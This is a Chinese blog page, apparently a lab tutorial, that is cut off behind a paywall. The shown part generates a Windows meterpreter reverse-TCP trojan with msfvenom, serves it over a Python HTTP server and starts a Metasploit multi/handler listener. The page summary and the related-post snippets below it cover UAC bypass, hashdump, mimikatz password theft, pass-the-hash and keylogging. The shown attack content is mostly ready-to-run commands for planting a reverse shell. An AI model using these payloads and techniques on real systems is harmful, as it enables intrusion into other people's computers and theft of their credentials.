msf生成木马抓取hash值

已于 2024-04-21 22:40:34 修改
阅读量686 收藏 15
点赞数 4
文章标签: 安全
于 2024-04-21 22:36:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/z65535/article/details/138039439
版权
本文详细介绍了如何在KaliLinux环境中生成木马,通过Metasploit框架进行监听并入侵Windows系统,包括设置payload、利用BypassUAC模块绕过UAC权限,最终获取管理员权限的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

环境准备:

名称

系统

 位数 IP

攻击机

 Kali Linux  64 192.168.88.132
用户机 Windows 10 64 192.168.88.137

一、生成木马

1.在kali机器上生成木马

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.88.132 LPORT=12345 -f exe -o shell.exe

2.开启http.server服务方便下载木马

python3 -m http.server 9999

二、Kali开启监听

1.开启MSF

┌──(root㉿Kali)-[~]
└─# msfconsole

2.使用监听模块

msf6 > use exploit/multi/handler
 
# 输出
[*] Using configured payload generic/shell_reverse_tcp

3.设置payload

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
 
# 输出
payload => windows/x64/meterpre
最低0.47元/天 解锁文章
内网渗透-Hash传递攻击
lza20001103的博客
10-01 1763
Hash传递攻击 文章目录Hash传递攻击前言psexec模块 前言 今天给大家讲解一个知识点,Hash传递攻击,它是在不知道明文密码,只知道hash的时候进行攻击的一种手段,会返回一个会话,且是system权限,但会遇到uac的问题,我们只要关闭uac就可以了。 psexec模块 利用的前提是必须开放445端口 首先,我们需要获得用户的hash 在kali中,不知道为什么hash获取不了,我们cs上线来获取hash Administrator的hash如下: aad3b435b51404eea
msf 使用 hashdump 和 wce 提取 hash
发哥微课堂
01-21 1万+
0x00:介绍 msf 在获取 shell 后为了更方便的进行渗透测试,可获取主机的 hash 以及域的 hash,即用户的密码,存在于 c 盘下的 windos 下的 system32 下的 config 下的 sam 文件中,以 hash 加密的方式存储,而系统开机后,hash 密码会以明文存在于内存中,获取 hash 的工具和方法有很多,这一节记录下 hashdump 和 wce 的使用。...
WCE Windows hash抓取工具 教程
Polemo的博客
03-09 7353
WCE 下载地址:链接:https://share.weiyun.com/5MqXW47 密码:bdpqku 工具界面
msf抓取hashdump的思考
a15183865601的博客
04-25 1277
1. windows登录的明文密码,存储过程是怎么样的,密文存在哪个文件下,该文件是否可以打开,并且查看到密文2. 我们通过hashdump 抓取出 所有用户的密文,分为两个模块,为什么?这两个模块分别都代表什么3. 为什么第一个模块 永远是一样的aad34. 这两个模块的加密算法有什么不同,如何加密的。
Windows、Linux 系统下查看文件hash、md5、sha
www.lazy.kim
02-10 501
【代码】Windows、Linux 系统下查看文件hash、md5、sha。
渗透测试学习笔记之案例三
Fly_鹏程万里
07-06 3207
0x00 前言看到了不少小伙伴似乎对渗透测试学习笔记系列文章有点兴趣,今天,笔者刚好抽空继续来写写吧!0x01 案例分析实验环境:目标靶机:10.11.1.0/24攻击机:Kali Linux (10.11.0.90)渗透过程:我们今天选取的目标靶机的IP为10.11.1.13。废话不多说,依旧nmap做端口探测。# nmap -sS -sV -p 1-1024 -Pn 10.11.1.13 S...
MSF回弹木马windows测试
Thewei666的博客
08-02 426
使用python3 -m http.server 9999来传递文件到windows主机中。管理员账号需在“此电脑”的“管理”的“当地用户和用户组”中打开登录选项,并设置好密码。kali系统中使用msfvenom命令生成windows系统的回弹木马。可以使用管理员账号登录或新建一个用户用于登录,但是新建的用户权限较低。可以查看到自己的权限还是很高的,属于Administrators组。因为打开了3389,所以可以使用本机的远程桌面来连接。查看端口,发现远程登录端口3389并没有打开。
抓取内网windows密码和利用hash横向及相关问题
vt_yjx的博客
04-20 506
因为mimikatz这个工具是利用了lsass.exe会把一份明文账号密码存到内存中,所以才能抓到,但是由于系统补丁才抓不到了。不过继续横向不需要明文密码,因为系统验证都是通过比对hash的,而哈希又是不可逆
CS与MSF的权限互相传递/mimikatz抓取windows 2012明文密码
qq_68163788的博客
06-26 1744
CS(Cobalt Strike)和MSF(Metasploit Framework)是两种常用的渗透测试工具,用于测试网络安全并获取权限。此外,mimikatz是一款功能强大的工具,可以用于抓取Windows系统中的明文密码。通过修改注册表和等待目标系统管理员重新登录,可以使得明文口令在lsass进程中保存。这样一旦管理员重新登录,mimikatz就可以成功地抓取到明文密码。这些工具在渗透测试和网络安全领域中具有重要的作用。
蓝桥杯-网络安全比赛(6) 模拟实验 Metasploit 控制并获取Windows 登录HASH、LM Hash和NTLM Hash密文解析
Superstacks超全栈
05-06 1188
计算机中的每个账号(如果是域服务器,则为域内的每个账号)的用户名和密码都存储在sam文件中,当计算机运行时,该文件对所有账号进行锁定,要。这是一个非常重要的设计原则,因为如果密码以明文形式存储,那么任何能够访问存储位置的人或程序都可以轻易地获取到密码,这显然是不安全的。在验证过程中,LSA可能会调用相应的验证程序包(如msv1_0.dll),对用户输入的信息进行处理,并与存储在SAM(安全账户管理器)数据库中的密钥进行对比。最后,winlogon进程对用户登录进行最后的处理,完成整个登录过程。
Metasploit学习笔记(六)——Meterpreter后渗透之Hash攻击提权(包含Mimikatz)
Zichel77的博客
10-09 3131
针对WIN7,还是用永恒之蓝。
nmap 渗透实列2
煮酒闲谈
08-25 1227
nmap 渗透实列20x00 前言该实列在上一实列的基础上 增加了提权的操作0x01 案例分析实验环境:目标靶机:10.11.1.0/24攻击机:Kali Linux (10.11.0.90) 渗透过程:我们今天选取的目标靶机的IP为10.11.1.13。废话不多说,依旧nmap做端口探测。# nmap -sS -sV -p 1-1024 -Pn 10.11.1.13Starting Nmap 7.
MSF后渗透总结
qq_51550750的博客
06-28 1400
MSF后渗透总结
msf进阶
2301_77147676的博客
03-23 182
在得到目标机shell后的进阶使用Keyscan_strat:开启键盘记录功能Keyscan_dump:显示捕捉到的键盘记录信息Keyscan_stop:停止键盘记录在mimikatz模块,能获取目标主机的哈希和明文密码,常用命令:以下均在msfconsole中运行Load mimikatz:加载mimikatzMsv:获取hashKerberos:获取明文密码Widigest:获取系统账户信息。
meterpreter详解与渗透实战
热门推荐
成长
01-24 3万+
payload介绍,meterpreter详解,以及网络渗透实战(拿下老爸电脑)
哈希传递攻击/黄金白银票据
Y5neKO's blog
09-17 2061
Q&A Q1:pth在什么情况下能成功、哈希传递受到什么限制、什么情况下不能传递? A1:①pth在获取到目标机器中RID为500的内置管理员账户或在目标机器本地管理员组的域成员账户的hash的情况下能成功;②哈希传递会受到目标系统上的UAC的限制,如果不是RID=500的内置账户则不会以完全管理员权限登录系统;③若目标系统完全禁止了所有用户的远程登录权限(包括RID为500的内置管理员),则无法进行传递。 Q2:安装补丁KB2871997后影响 A2:见文章中KB2871997补丁 -->
metasploit获取系统密码hash
天元喜羊羊的博客
04-27 6107
meterpreter > run hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY e503dc5ce6734d7f11ccecf5623b0f1c... [*] Obtaining the user list and keys... [*] Decrypting user keys
Metasploit之Hash传递渗透
a1b2c3是弱口令
12-06 3179
讲述Metasploit知道内网机器密码或者是不知道密码能够拿到shell获取到hash的两种渗透测试。 测试环境 目标机: Windows 7 Ultimate 192.168.1.9 攻击机: Linux 4.6.0-kali1-amd64 192.168.1.31 I HAVE PASS 攻击机姿势: msfconsole use exploit/windows/smb/psex...
Metasploit使用hash直接登录系统
fengling132的专栏
05-08 1331
抓到管理员的密码hash根本不用破解,直接就可以登录。 1 2 3 4 5 6 7 8 9 10 11 12 13 use windows/smb/psexec   set SMBUser username   set SMBPass 用户密码的hash   set payload Windows/meterpreter/reverse_tcp   set rh
MSF生成木马php
最新发布
01-08
为了使用Metasploit Framework(MSF)创建一个PHP后门,可以采用`msfvenom`工具来生成所需的恶意脚本。此过程涉及几个关键步骤。 #### 准备工作环境 确保已安装并配置好Metasploit框架。通过终端访问该平台,并确认...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值